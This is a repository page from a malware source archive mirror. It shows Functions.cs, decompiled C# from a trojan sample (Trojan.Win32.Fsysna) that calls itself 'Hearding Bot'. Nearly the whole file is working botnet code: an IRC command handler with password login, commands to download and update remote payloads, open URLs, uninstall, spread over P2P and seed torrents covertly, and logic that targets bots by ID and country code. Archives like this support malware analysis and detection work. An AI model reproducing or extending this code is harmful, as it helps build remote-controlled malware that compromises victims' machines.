ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-12 13:25:30 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a/Functions.cs

238 lines
6.4 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Hearding_Bot.Functions
// Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe
using System;
using System.Diagnostics;
using System.Net.Sockets;
using System.Threading;
namespace Hearding_Bot
{
internal class Functions
{
public static string msg = "";
public static bool runn = false;
public static string prox = "";
public static bool loggedIn = false;
public static int signum = 0;
public static void determineCommand(string cmd)
{
string[] strArray = new string[2];
if (cmd.Contains(" "))
strArray = cmd.Split(new char[1]{ ' ' }, 2);
else
strArray[0] = cmd;
if (strArray[0].ToString().ToLower() == "login")
Functions.login(strArray[1]);
if (!Functions.loggedIn)
return;
switch (strArray[0].ToString().ToLower())
{
case "visit":
Process.Start(strArray[1]);
Irc.WriteTo(Config.ircChannel, strArray[1] + " has been opened!");
break;
case "logout":
Functions.logout();
break;
case "disconnect":
Functions.kill();
break;
case "reconnect":
Functions.recon();
break;
case "sort":
Irc.Write("JOIN #" + botInfo.countryCode(botInfo.codeType.Short));
break;
case "unsort":
Irc.Write("PART #" + botInfo.countryCode(botInfo.codeType.Short));
break;
case "uninstall":
Install.uninstall((string) null);
break;
case "download":
downloadUpdate.downloadThread(strArray[1]);
break;
case "update":
downloadUpdate.updateThread(strArray[1]);
break;
case "p2p":
P2P.p2p();
break;
case "seed":
if (utSeed.Check())
{
try
{
utSeed.Run();
utSeed.SeedIt(strArray[1]);
utSeed.HideIt();
Irc.WriteTo(Config.ircChannel, "[SEED]: Seeding Has Started On " + strArray[1] + "!");
}
catch
{
}
}
if (utSeed.Check())
break;
Irc.WriteTo(Config.ircChannel, "[SEED]: Seeding Could not Begin due to lack of P2P Software!");
break;
}
}
private static void killProc(string procName)
{
Process process1 = (Process) null;
foreach (Process process2 in Process.GetProcesses())
{
if (process2.ProcessName.ToLower() == procName.ToLower())
{
process1 = process2;
break;
}
}
if (process1 != null)
{
try
{
process1.Kill();
Irc.WriteTo(Config.ircChannel, "Killed " + procName);
}
catch (Exception ex)
{
Irc.WriteTo(Config.ircChannel, "Failed to end process");
}
}
else
Irc.WriteTo(Config.ircChannel, "No such process found");
}
public static void kill()
{
Irc.ircClient = (TcpClient) null;
while (true)
{
Thread.Sleep(15);
try
{
Process.GetCurrentProcess().Kill();
break;
}
catch (Exception ex)
{
}
}
}
public static void recon()
{
Process.Start(Config.installPath + Config.installFile);
Functions.kill();
}
private static void logout()
{
Irc.WriteTo(Config.ircChannel, "Logged out.");
Functions.loggedIn = false;
}
private static void login(string cmd)
{
if (!(cmd == Config.botPassword) || Functions.loggedIn)
return;
Irc.WriteTo(Config.ircChannel, "Auth Accepted!");
Functions.loggedIn = true;
}
public static void determineWho(string cmd)
{
bool flag1 = true;
bool flag2 = true;
bool flag3 = false;
bool flag4 = false;
if (cmd.Contains("b{") && cmd.Contains("}"))
{
flag1 = false;
int startIndex = cmd.IndexOf("b{") + 2;
int num = cmd.IndexOf('}', startIndex);
string str1 = cmd.Substring(startIndex, num - startIndex);
if (str1[0] == '!')
{
flag1 = true;
flag4 = true;
}
cmd = cmd.Replace("b{" + str1 + "} ", "");
if (flag4)
str1 = str1.Substring(1);
if (str1.Contains(","))
{
string str2 = str1;
char[] chArray = new char[1]{ ',' };
foreach (string str3 in str2.Split(chArray))
{
if (str3.ToLower() == Config.botRandom.ToLower())
{
flag3 = true;
flag1 = !flag4;
break;
}
}
}
else if (str1.ToLower() == Config.botRandom.ToLower())
{
flag3 = true;
flag1 = !flag4;
}
}
if (!flag1)
return;
bool flag5 = false;
if (cmd.Contains("c{") && cmd.Contains("}"))
{
flag2 = false;
int startIndex = cmd.IndexOf("c{") + 2;
int num = cmd.IndexOf('}', startIndex);
string str4 = cmd.Substring(startIndex, num - startIndex);
if (str4[0] == '!')
{
flag2 = true;
flag5 = true;
}
cmd = cmd.Replace("c{" + str4 + "} ", "");
if (flag5)
str4 = str4.Substring(1);
if (str4.Contains(","))
{
string str5 = str4;
char[] chArray = new char[1]{ ',' };
foreach (string str6 in str5.Split(chArray))
{
if (str6.ToLower() == botInfo.countryCode(botInfo.codeType.Short).ToLower())
{
flag2 = !flag5;
break;
}
}
}
else if (str4.ToLower() == botInfo.countryCode(botInfo.codeType.Short).ToLower())
flag2 = !flag5;
}
if ((!flag1 || !flag2) && (!flag1 || !flag3 || flag2))
return;
Functions.determineCommand(cmd);
}
public static byte[] ConvertToByteArray(string[] stringArray)
{
byte[] byteArray = new byte[stringArray.Length - 1];
for (int index = 0; index <= stringArray.Length - 1; ++index)
byteArray[index] = Convert.ToByte(stringArray[index]);
return byteArray;
}
}
}
Reference in New Issue Copy Permalink